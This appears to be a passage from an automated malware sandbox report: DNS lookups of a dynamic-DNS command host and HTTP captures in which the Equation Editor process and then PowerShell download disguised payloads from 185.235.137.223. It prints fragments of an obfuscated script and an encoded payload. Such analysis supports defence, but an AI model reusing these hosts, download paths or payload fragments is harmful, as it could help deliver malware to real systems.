                                                                                            Sep 27, 2024 14:03:45.023657084 CEST8.8.8.8192.168.2.220x1137No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:45.031347990 CEST8.8.8.8192.168.2.220x1137No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:45.510981083 CEST8.8.8.8192.168.2.220xf2ffServer failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:50.037794113 CEST8.8.8.8192.168.2.220x1137Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:53.160645962 CEST8.8.8.8192.168.2.220x4da7No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:55.311009884 CEST8.8.8.8192.168.2.220x4da7Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:55.340141058 CEST8.8.8.8192.168.2.220x4da7No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:56.364638090 CEST8.8.8.8192.168.2.220x1e4No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:56.373001099 CEST8.8.8.8192.168.2.220x1e4No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:56.380108118 CEST8.8.8.8192.168.2.220x1e4No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:56.386998892 CEST8.8.8.8192.168.2.220x1e4No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:56.394016981 CEST8.8.8.8192.168.2.220x1e4No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:58.167323112 CEST8.8.8.8192.168.2.220x4da7Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:58.518785954 CEST8.8.8.8192.168.2.220x1f2No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:58.528866053 CEST8.8.8.8192.168.2.220x1f2No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:58.536273003 CEST8.8.8.8192.168.2.220x1f2No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:58.542874098 CEST8.8.8.8192.168.2.220x1f2No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:59.575504065 CEST8.8.8.8192.168.2.220xde5No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:59.582453966 CEST8.8.8.8192.168.2.220xde5No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:59.589376926 CEST8.8.8.8192.168.2.220xde5No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:00.318022013 CEST8.8.8.8192.168.2.220x4da7Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:03.526823997 CEST8.8.8.8192.168.2.220x1f2Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:04.596395969 CEST8.8.8.8192.168.2.220xde5Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:05.709353924 CEST8.8.8.8192.168.2.220x2ffbNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:05.723002911 CEST8.8.8.8192.168.2.220x2ffbNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:05.734395981 CEST8.8.8.8192.168.2.220x2ffbNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:05.745747089 CEST8.8.8.8192.168.2.220x2ffbNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:05.756304026 CEST8.8.8.8192.168.2.220x2ffbNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:06.773870945 CEST8.8.8.8192.168.2.220x80c9No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:06.785607100 CEST8.8.8.8192.168.2.220x80c9No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:06.795650005 CEST8.8.8.8192.168.2.220x80c9No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:06.804503918 CEST8.8.8.8192.168.2.220x80c9No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:06.812680960 CEST8.8.8.8192.168.2.220x80c9No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:07.839571953 CEST8.8.8.8192.168.2.220x521aNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:07.848284006 CEST8.8.8.8192.168.2.220x521aNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:07.856482983 CEST8.8.8.8192.168.2.220x521aNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:07.865385056 CEST8.8.8.8192.168.2.220x521aNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:07.877347946 CEST8.8.8.8192.168.2.220x521aNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:08.596848965 CEST8.8.8.8192.168.2.220xde5Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:08.906687975 CEST8.8.8.8192.168.2.220xca60No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:08.913932085 CEST8.8.8.8192.168.2.220xca60No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:08.920460939 CEST8.8.8.8192.168.2.220xca60No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:08.927335978 CEST8.8.8.8192.168.2.220xca60No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:08.934551001 CEST8.8.8.8192.168.2.220xca60No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:10.075550079 CEST8.8.8.8192.168.2.220x503No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:10.085093975 CEST8.8.8.8192.168.2.220x503No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:10.092226028 CEST8.8.8.8192.168.2.220x503No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:10.100419044 CEST8.8.8.8192.168.2.220x503No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:10.108267069 CEST8.8.8.8192.168.2.220x503No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:11.121412992 CEST8.8.8.8192.168.2.220xc35fNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:11.128639936 CEST8.8.8.8192.168.2.220xc35fNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:11.136590004 CEST8.8.8.8192.168.2.220xc35fNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:11.144114017 CEST8.8.8.8192.168.2.220xc35fNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:11.150511980 CEST8.8.8.8192.168.2.220xc35fNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:12.184353113 CEST8.8.8.8192.168.2.220x19No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:12.191869020 CEST8.8.8.8192.168.2.220x19No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:12.200510979 CEST8.8.8.8192.168.2.220x19No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:12.209937096 CEST8.8.8.8192.168.2.220x19No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:12.218043089 CEST8.8.8.8192.168.2.220x19No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:14.687094927 CEST8.8.8.8192.168.2.220x3c71No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:14.696247101 CEST8.8.8.8192.168.2.220x3c71No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:14.703672886 CEST8.8.8.8192.168.2.220x3c71No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:14.710879087 CEST8.8.8.8192.168.2.220x3c71No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:14.718381882 CEST8.8.8.8192.168.2.220x3c71No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:16.136816025 CEST8.8.8.8192.168.2.220xff25No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:16.144876003 CEST8.8.8.8192.168.2.220xff25No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:16.151855946 CEST8.8.8.8192.168.2.220xff25No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:16.169992924 CEST8.8.8.8192.168.2.220xff25No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:18.989952087 CEST8.8.8.8192.168.2.220x42e1No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:24.007128954 CEST8.8.8.8192.168.2.220x42e1Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:25.013233900 CEST8.8.8.8192.168.2.220x42e1Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false

                                                                                            HTTP Request Dependency Graph

                                                                                            • ia601706.us.archive.org
                                                                                            • 185.235.137.223

                                                                                            HTTP Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.2249161185.235.137.223803420C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Sep 27, 2024 14:00:12.072154045 CEST336OUTGET /220/someimportantmeetingsgoing.tIF HTTP/1.1
                                                                                            Accept: */*
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                            Host: 185.235.137.223
                                                                                            Connection: Keep-Alive
                                                                                            Sep 27, 2024 14:00:12.695019960 CEST1236INHTTP/1.1 200 OK
                                                                                            Date: Fri, 27 Sep 2024 12:00:12 GMT
                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                            Last-Modified: Tue, 10 Sep 2024 08:56:30 GMT
                                                                                            ETag: "32ab8-621c00cb63cca"
                                                                                            Accept-Ranges: bytes
                                                                                            Content-Length: 207544
                                                                                            Keep-Alive: timeout=5, max=100
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: image/tiff
                                                                                            Data Raw: ff fe 69 00 4c 00 69 00 6b 00 4c 00 4c 00 55 00 50 00 41 00 4c 00 73 00 62 00 78 00 62 00 20 00 3d 00 20 00 22 00 54 00 6b 00 62 00 6d 00 55 00 4b 00 73 00 47 00 6e 00 66 00 64 00 7a 00 62 00 65 00 22 00 0d 00 0a 00 47 00 7a 00 65 00 57 00 47 00 6e 00 70 00 69 00 78 00 4f 00 69 00 4c 00 78 00 50 00 20 00 3d 00 20 00 22 00 66 00 74 00 4b 00 57 00 5a 00 51 00 64 00 4c 00 4b 00 69 00 4e 00 69 00 48 00 6e 00 22 00 0d 00 0a 00 51 00 57 00 57 00 47 00 4b 00 76 00 4b 00 54 00 4e 00 4f 00 7a 00 68 00 65 00 74 00 20 00 3d 00 20 00 22 00 43 00 4c 00 51 00 57 00 76 00 65 00 4a 00 4c 00 75 00 42 00 6a 00 65 00 66 00 4c 00 22 00 0d 00 0a 00 4f 00 76 00 4c 00 6b 00 69 00 74 00 51 00 4f 00 4e 00 75 00 47 00 6d 00 4a 00 4b 00 20 00 3d 00 20 00 22 00 6e 00 4b 00 52 00 71 00 69 00 70 00 43 00 67 00 7a 00 6f 00 65 00 50 00 63 00 6b 00 22 00 0d 00 0a 00 4b 00 74 00 47 00 48 00 43 00 4c 00 50 00 57 00 69 00 47 00 63 00 76 00 63 00 71 00 20 00 3d 00 20 00 22 00 4c 00 4c 00 6b 00 63 00 47 00 4b 00 4c 00 4c 00 71 00 4c 00 [TRUNCATED]
                                                                                            Data Ascii: iLikLLUPALsbxb = "TkbmUKsGnfdzbe"GzeWGnpixOiLxP = "ftKWZQdLKiNiHn"QWWGKvKTNOzhet = "CLQWveJLuBjefL"OvLkitQONuGmJK = "nKRqipCgzoePck"KtGHCLPWiGcvcq = "LLkcGKLLqLqxmU"kcuUmeWxWlsWhP = "pcaSRLCcvgGmlW"ULaZCkZkGLLZhq = "KcPUQipcqWLqLW"ccciGoOGnRehem = "CodLBLGzUAOePu"KalhkckioNGktn = "ZUOzfNoLiqSKbS"WANRltGLcibpHp = "LuKtekbWoGJtLd"kqlOAhLbiCGiGu = "WOLWtKGcKWKhTz"TfjrUOaKiAQxUa = "LeAdUfGUKxhhWB"LbmWWcdWxCzxKx = "PPBrWfHieTnHfG"LWQ
                                                                                            Sep 27, 2024 14:00:12.695226908 CEST224INData Raw: 00 55 00 75 00 47 00 52 00 57 00 57 00 69 00 69 00 75 00 69 00 66 00 20 00 3d 00 20 00 22 00 43 00 4b 00 41 00 74 00 6d 00 61 00 4c 00 5a 00 50 00 4f 00 52 00 52 00 52 00 63 00 22 00 0d 00 0a 00 6b 00 5a 00 4b 00 50 00 75 00 4b 00 78 00 57 00 6e
                                                                                            Data Ascii: UuGRWWiiuif = "CKAtmaLZPORRRc"kZKPuKxWnNfRUo = "LLhaqmaspxhjoz"CxikktiUpviGCf = "rhmJotmrWsLeKi"cnSqWffPLU
                                                                                            Sep 27, 2024 14:00:12.695259094 CEST1236INData Raw: 00 6e 00 6f 00 41 00 4c 00 20 00 3d 00 20 00 22 00 76 00 4c 00 74 00 4c 00 4b 00 6b 00 6c 00 4c 00 41 00 63 00 66 00 47 00 57 00 6d 00 22 00 0d 00 0a 00 73 00 4b 00 4b 00 53 00 4f 00 4f 00 6b 00 63 00 69 00 6c 00 65 00 63 00 62 00 4f 00 20 00 3d
                                                                                            Data Ascii: noAL = "vLtLKklLAcfGWm"sKKSOOkcilecbO = "GBkLoCWumCKchL"dCLAfGLfJLLiGc = "KbWfALrLAeNZOB"mumxWUBWWvApRZ = "UOZiHdPk
                                                                                            Sep 27, 2024 14:00:12.695565939 CEST1236INData Raw: 00 69 00 4b 00 50 00 4b 00 4b 00 4c 00 67 00 6d 00 6f 00 22 00 0d 00 0a 00 5a 00 69 00 4f 00 6b 00 5a 00 78 00 4c 00 4b 00 4c 00 4c 00 72 00 5a 00 62 00 62 00 20 00 3d 00 20 00 22 00 75 00 70 00 7a 00 47 00 5a 00 57 00 7a 00 4c 00 4c 00 55 00 6c
                                                                                            Data Ascii: iKPKKLgmo"ZiOkZxLKLLrZbb = "upzGZWzLLUlAxG"IAfLpNqNziCQWc = "IRZLuzmWpLGPzC"xLrNKTlNckLfPb = "irdKkWWcfUsGkj"KLRG
                                                                                            Sep 27, 2024 14:00:12.695600986 CEST1236INData Raw: 00 75 00 43 00 67 00 4f 00 78 00 47 00 4c 00 69 00 22 00 0d 00 0a 00 65 00 63 00 4b 00 69 00 52 00 50 00 6f 00 63 00 63 00 6b 00 66 00 41 00 55 00 63 00 20 00 3d 00 20 00 22 00 64 00 52 00 6e 00 52 00 68 00 4b 00 74 00 48 00 5a 00 6e 00 43 00 61
                                                                                            Data Ascii: uCgOxGLi"ecKiRPocckfAUc = "dRnRhKtHZnCaZk"LedWWxgKUziPzt = "WpKHPKPLiPKAWc"KkKRWPKtQcqNdf = "KptUtfzNncmekP"LNeAc
                                                                                            Sep 27, 2024 14:00:12.695636988 CEST1236INData Raw: 00 63 00 6c 00 4b 00 6b 00 20 00 3d 00 20 00 22 00 4c 00 43 00 53 00 4c 00 4c 00 4b 00 5a 00 57 00 69 00 7a 00 63 00 73 00 47 00 57 00 22 00 0d 00 0a 00 4a 00 66 00 55 00 6c 00 57 00 62 00 4b 00 4b 00 64 00 4c 00 65 00 57 00 4b 00 48 00 20 00 3d
                                                                                            Data Ascii: clKk = "LCSLLKZWizcsGW"JfUlWbKKdLeWKH = "hLkffPKZNbWduG"pJnfdLLmWbrfWK = "WtfNleQWnWKLbz"cWNWhnKLkuWBGf = "WdHBdq
                                                                                            Sep 27, 2024 14:00:12.696454048 CEST896INData Raw: 00 68 00 5a 00 63 00 22 00 0d 00 0a 00 64 00 4a 00 76 00 6f 00 4b 00 4b 00 4e 00 6c 00 6b 00 5a 00 78 00 47 00 57 00 70 00 20 00 3d 00 20 00 22 00 68 00 5a 00 57 00 41 00 4f 00 57 00 47 00 43 00 57 00 6d 00 4a 00 55 00 4c 00 51 00 22 00 0d 00 0a
                                                                                            Data Ascii: hZc"dJvoKKNlkZxGWp = "hZWAOWGCWmJULQ"jGGWLfWzqxkiOO = "tizBeclfWWhpuo"kriQiWffuQizWW = "RQzLfpUGnWuGPJ"qHuuGHzkKU
                                                                                            Sep 27, 2024 14:00:12.696501970 CEST1236INData Raw: 00 42 00 57 00 63 00 6e 00 52 00 4c 00 20 00 3d 00 20 00 22 00 7a 00 57 00 50 00 55 00 72 00 4e 00 6d 00 4c 00 64 00 5a 00 78 00 54 00 43 00 4c 00 22 00 0d 00 0a 00 52 00 47 00 65 00 61 00 69 00 4b 00 69 00 53 00 7a 00 57 00 6d 00 57 00 57 00 64
                                                                                            Data Ascii: BWcnRL = "zWPUrNmLdZxTCL"RGeaiKiSzWmWWd = "SAfZLZuUbLccKp"bZGiLRzhgPozLq = "pLWpaKHUCiOLGU"ereiGWTWkGeAxK = "sGOg
                                                                                            Sep 27, 2024 14:00:12.696536064 CEST1236INData Raw: 00 4b 00 75 00 57 00 22 00 0d 00 0a 00 75 00 51 00 5a 00 65 00 4c 00 55 00 65 00 68 00 75 00 64 00 4e 00 57 00 55 00 4c 00 20 00 3d 00 20 00 22 00 70 00 65 00 4c 00 68 00 5a 00 66 00 6d 00 6e 00 4a 00 66 00 64 00 47 00 50 00 70 00 22 00 0d 00 0a
                                                                                            Data Ascii: KuW"uQZeLUehudNWUL = "peLhZfmnJfdGPp"rJUOLWPLWhNeNK = "WNIrLcLnoomarfolhoKR"UtqAlPJcmlLekL = "UUiCJkNaJxWAjm"WLIL
                                                                                            Sep 27, 2024 14:00:12.697310925 CEST1236INData Raw: 00 61 00 4a 00 4b 00 50 00 7a 00 43 00 57 00 20 00 3d 00 20 00 22 00 71 00 4b 00 6f 00 63 00 47 00 4a 00 43 00 50 00 4c 00 6d 00 50 00 6e 00 78 00 57 00 22 00 0d 00 0a 00 61 00 6d 00 6b 00 70 00 57 00 42 00 70 00 63 00 75 00 69 00 47 00 70 00 63
                                                                                            Data Ascii: aJKPzCW = "qKocGJCPLmPnxW"amkpWBpcuiGpck = "qdWWpLiccWAWLL"KLBPLLLOueKHUz = "PNmWZSWWWqqZks"NRTAmkWrPhkJpb = "teWcK
                                                                                            Sep 27, 2024 14:00:12.700030088 CEST1236INData Raw: 00 63 00 54 00 4e 00 55 00 57 00 6e 00 7a 00 5a 00 5a 00 57 00 5a 00 6f 00 22 00 0d 00 0a 00 5a 00 4c 00 76 00 4c 00 47 00 4c 00 55 00 43 00 6d 00 69 00 57 00 57 00 4c 00 4e 00 20 00 3d 00 20 00 22 00 66 00 74 00 70 00 63 00 66 00 61 00 6b 00 6e
                                                                                            Data Ascii: cTNUWnzZZWZo"ZLvLGLUCmiWWLN = "ftpcfaknLzbzdp"eRWGlPAqhcQcoi = "hoRULokiUuLcCI"RLniSWWkLWTOed = "LeWNihcKhfNtiL"t


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.2249163185.235.137.223803732C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Sep 27, 2024 14:00:18.469228029 CEST78OUTGET /220/RDESC.txt HTTP/1.1
                                                                                            Host: 185.235.137.223
                                                                                            Connection: Keep-Alive
                                                                                            Sep 27, 2024 14:00:19.102987051 CEST1236INHTTP/1.1 200 OK
                                                                                            Date: Fri, 27 Sep 2024 12:00:18 GMT
                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                            Last-Modified: Tue, 10 Sep 2024 08:53:50 GMT
                                                                                            ETag: "a1000-621c00324bbf2"
                                                                                            Accept-Ranges: bytes
                                                                                            Content-Length: 659456
                                                                                            Keep-Alive: timeout=5, max=100
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: text/plain
                                                                                            Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAAjAcAEA4Dt+AqPY6Dh+wnP05Db+gmPg5DT+QkPw4DK+AiPY4DF+AhPM4DC+AQP83D99AePY3Dx9wbP02Dr9gYPA2De9QXPY1DO9QTPYwD+8gNP4yDm8gHPYxDO8gxO4vD27g7OYuDe7g1O4sDG6gvOYrDu6gpO4pDW6gjO0oDG5gfOYnDu5gZO8lDe5AXOQlDM5ABOwjD04ALOQiDc4AFOwgDF4gwNofDy3g6NIeDa3g0NocDC2QvNsbD62AuNYbD02wsNgaDm2woNoZDW2QlN4YDN2whNYYDE1QfNwXD61AZNEWDZ1gVNQVDP1QTNwUDL1QSNcUDF1AAN4TD90APNoTD40gNNETDv0gKNgSDn0gJNQSDi0AINsRDZ0AGNYRDU0gENERDK0QCNMMD/zg8MAPDtzQ6MwNDazw1MMNDGzAxMEID9yAsM4KDrywpMoJDYyQlMEJDEygQM8HD7xgbMwGDpxQZMgFDWxwUM8EDCxAAM0DD7wQOMwCDqwwJMUCDjwgFMQBDRwwDM0ADAAAQAQCgBgDwP4/D7/w9Po+Do/Q5PE+DU/g0P88DL/wxPI4Dx+wrPw6Do+ApP85DO+AjPk4DF9AePYnDi5AXOolDZ5AWOQlDT5wTOkkDH5gROUkDE5wQOIgD+4QPOkjDz4QMOAjDv4
                                                                                            Sep 27, 2024 14:00:19.103004932 CEST224INData Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
                                                                                            Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1
                                                                                            Sep 27, 2024 14:00:19.103017092 CEST1236INData Raw: 41 56 4e 4d 56 44 53 31 67 54 4e 30 55 44 4a 31 77 51 4e 45 55 44 41 30 77 50 4e 34 54 44 36 30 51 4f 4e 55 54 44 76 30 51 4c 4e 77 53 44 72 30 77 4a 4e 59 53 44 69 30 41 48 4e 6f 52 44 5a 30 51 46 4e 51 52 44 51 30 67 43 4e 67 51 44 48 30 77 41
                                                                                            Data Ascii: AVNMVDS1gTN0UDJ1wQNEUDA0wPN4TD60QONUTDv0QLNwSDr0wJNYSDi0AHNoRDZ0QFNQRDQ0gCNgQDH0wANIMD8zw+MoPD5zA9MIPDxAAQAcBgBQDQOokDJAAAAMAgBADAAA0D8AAAAMAgBwCAOwjD64QJOQiDj4gFO4gDF3w/N4fD63A9NYeDi3w2NodDS3Q0NAdDPAAAAwAgBQCgNAZDP1AcN8WDu1QbNwWDr1gaNcWDm1QZN
                                                                                            Sep 27, 2024 14:00:19.103029966 CEST1236INData Raw: 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a 44
